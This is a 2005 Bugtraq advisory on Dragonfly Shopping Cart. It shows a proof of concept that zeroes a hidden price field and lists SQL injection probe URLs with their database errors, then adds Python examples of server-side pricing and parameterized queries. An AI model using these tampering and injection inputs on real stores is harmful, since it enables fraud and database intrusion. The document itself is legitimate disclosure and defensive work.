List: bugtraq
Subject: Dragonfly Shopping Cart Multiple vulnerabilities
From: dcrab () hackerscenter ! com
Date: 2005-07-12 8:53:52
Message-ID: 20050712085352.13762.qmail () securityfocus ! com
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: Dragonfly Shopping Cart Multiple vulnerabilities
Date: 11/07/2005
Vendor: DragonFly Shopping Cart
Vendor Website: http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=5
Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow modifying of product prices, along with SQL injection vulnerabilities.
Proof of Concept Exploits:
Hidden Price Value Vulnerability
You can modify these hidden fields to change the price of the product and thus purchase the largest and most expensive products for the cheapest possible prices, or even for nothing.
/demo/dc_Categorieslist.asp
HPVV
<input type="hidden" name="x_DragonflyCartProductPrice" value="15.49" size="4">
/demo/dc_Categoriesview.asp
HPVV
<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">
/demo/dc_productslist.asp
HPVV
<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">
/demo/dc_productslist_Clearance.asp
HPVV
<input type="hidden" name="x_DragonflyCartProductPrice" value="0" size="4">
There are also many other hidden fields, like IP address etc., which can be used to make the attack "technically" more anonymous, though any normal logging system would catch you ;).
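The root cause of the hidden price value issue is that the server charges whatever the client posts. The following Python function is an added illustration of the fix, not code from Dragonfly Shopping Cart: the posted x_DragonflyCartProductPrice field is ignored for pricing, the amount is looked up from the server's own catalog, and the peer address is taken from the connection rather than from a posted field. The catalog, the product_key and qty field names, and the x_ClientIP field name are constructed for the example; only x_DragonflyCartProductPrice comes from the advisory. The posted price is still compared with the catalog value so that tampering attempts can be logged.

```python
from decimal import Decimal, InvalidOperation

# Constructed catalog: the server's authoritative price list, keyed by product key.
CATALOG = {
    "101": {"name": "Example Widget", "price": Decimal("15.49")},
    "102": {"name": "Example Gadget", "price": Decimal("249.00")},
}

CLIENT_PRICE_FIELD = "x_DragonflyCartProductPrice"   # field name from the advisory
CLIENT_IP_FIELD = "x_ClientIP"                      # hypothetical name for a posted-IP field


def add_to_cart(form, remote_addr, catalog=CATALOG):
    """Build a cart line from a posted form.

    form        -- dict of posted fields (hidden inputs included)
    remote_addr -- the peer address the web server actually observed

    Returns (cart_line, warnings). The posted price never influences the
    amount charged; it is only compared with the catalog so that tampering
    can be logged and acted on.
    """
    warnings = []
    product_key = str(form.get("product_key", ""))   # hypothetical field name
    product = catalog.get(product_key)
    if product is None:
        raise ValueError("unknown product key")

    try:
        qty = int(form.get("qty", "1"))               # hypothetical field name
    except ValueError:
        raise ValueError("quantity must be an integer")
    if qty < 1:
        raise ValueError("quantity must be positive")

    authoritative_price = product["price"]

    # Detection: compare the client's claimed price with the server's price.
    posted_price = form.get(CLIENT_PRICE_FIELD)
    if posted_price is not None:
        try:
            if Decimal(posted_price) != authoritative_price:
                warnings.append(
                    f"price tamper: posted {posted_price} vs catalog "
                    f"{authoritative_price} for product {product_key} from {remote_addr}"
                )
        except InvalidOperation:
            warnings.append(f"price field not numeric: {posted_price!r} from {remote_addr}")

    # A posted IP field carries no authority; log a mismatch, record the real peer.
    posted_ip = form.get(CLIENT_IP_FIELD)
    if posted_ip is not None and posted_ip != remote_addr:
        warnings.append(f"client-supplied ip {posted_ip} differs from observed {remote_addr}")

    cart_line = {
        "product_key": product_key,
        "name": product["name"],
        "unit_price": authoritative_price,
        "qty": qty,
        "line_total": authoritative_price * qty,
        "remote_addr": remote_addr,   # from the connection, not from the form
    }
    return cart_line, warnings


if __name__ == "__main__":
    # Constructed request: the hidden price has been set to 0.
    line, notes = add_to_cart(
        {"product_key": "101", "qty": "2", CLIENT_PRICE_FIELD: "0"}, "203.0.113.7"
    )
    print(line["line_total"], notes)
```

The warnings list is what a logging or fraud-review pipeline would consume; a mismatch between the posted price and the catalog price is a high-confidence signal of form tampering, since a legitimate browser resubmits the hidden value unchanged.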
Sql Injections
/demo/dc_Categoriesview.asp??key='&RecPerPage=5
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_Categoriesview.asp, line 1054
/demo/dc_Categoriesview.asp?key=%26dir%26
Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression '[CategoryKey] = &dir&'.
/demo/dc_Categoriesview.asp, line 1054
/demo/dc_productslist_Clearance.asp
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.
/demo/dc_productslist_Clearance.asp, line 292
/demo/dc_productslist_Clearance.asp?cmd=%27
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression '([ProductActive] = 'show' AND ([ProductClearancePage] = 'yes' AND ProductClearanceStartDate < #7/7/2005# AND ProductClearanceEndDate >= #7/7/2005#)) AND ((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' ))'.
/demo/dc_productslist_Clearance.asp, line 292
/demo/ratings.asp??PID='
Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression '[ProductKey]=''.
/demo/ratings.asp, line 68
/demo/dc_Productsview.asp
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_Productsview.asp, line 931
/demo/dc_forum_Postslist.asp?start='
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'nTotalRecs'
/demo/dc_forum_Postslist.asp, line 319
/demo/dc_forum_Postslist.asp?key_m='
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_forum_Postslist.asp, line 200
/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype='
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_forum_Postslist.asp, line 200
/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1
Microsoft JET Database Engine error '80040e07'
Data type mismatch in criteria expression.
/demo/dc_forum_Postslist.asp, line 200
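The JET errors above fall into two groups: "Data type mismatch" where an unvalidated value is pasted into a numeric comparison (key, PID, key_m, start), and "Syntax error in string" where a quote closes a string literal in a LIKE search. The following Python code is an added example of the corresponding fix and is not the product's ASP code; it uses an in-memory sqlite3 database as a stand-in for the JET backend, with a constructed schema whose table and column names follow those visible in the error messages. Integer keys are validated before any SQL is built, and search terms are bound as parameters so they remain data.

```python
import sqlite3

# Constructed stand-in for the catalog database referenced by the error messages.
SCHEMA = """
CREATE TABLE Categories (CategoryKey INTEGER PRIMARY KEY, CategoryName TEXT);
CREATE TABLE Products (
    ProductKey INTEGER PRIMARY KEY,
    ProductName TEXT,
    ProductDescriptionShort TEXT,
    ProductActive TEXT
);
"""
SAMPLE_ROWS = [
    ("INSERT INTO Categories VALUES (?, ?)", [(5, "Widgets"), (6, "Gadgets")]),
    ("INSERT INTO Products VALUES (?, ?, ?, ?)", [
        (1, "Widget One", "first widget", "show"),
        (2, "Gadget Two", "hidden gadget", "hide"),
    ]),
]


def open_demo_db():
    """Create the constructed in-memory database with sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for sql, rows in SAMPLE_ROWS:
        conn.executemany(sql, rows)
    return conn


def parse_record_key(raw):
    """Validate an integer record key (key, PID, key_m, start) before it nears SQL.

    Returning None lets the caller answer with a normal 'not found' page
    instead of exposing a database error, and it removes the numeric
    comparison as an injection point entirely."""
    try:
        return int(raw)
    except (TypeError, ValueError):
        return None


def get_category(conn, raw_key):
    """Look up a category by its validated integer key using a bound parameter."""
    key = parse_record_key(raw_key)
    if key is None:
        return None
    return conn.execute(
        "SELECT CategoryKey, CategoryName FROM Categories WHERE CategoryKey = ?",
        (key,),
    ).fetchone()


def search_products(conn, term):
    """Free-text search (psearch / clearance page) with the term bound as data.

    Because the driver binds the parameter, a quote inside the term cannot
    terminate the string literal, so the "Syntax error in string" failure
    mode from the advisory cannot occur."""
    pattern = "%" + term + "%"
    return conn.execute(
        "SELECT ProductKey, ProductName FROM Products "
        "WHERE ProductActive = 'show' AND "
        "(ProductName LIKE ? OR ProductDescriptionShort LIKE ?)",
        (pattern, pattern),
    ).fetchall()


if __name__ == "__main__":
    db = open_demo_db()
    print(get_category(db, "5"), get_category(db, "'"))
    print(search_products(db, "Widget"), search_products(db, "'"))
```

Note that binding does not neutralise LIKE wildcards: a term containing % still matches broadly. That is a search-scope concern rather than injection, and can be handled by escaping % and _ in the term with an ESCAPE clause if it matters for the application.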
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Look out for my soon to come out book on Secure coding with php.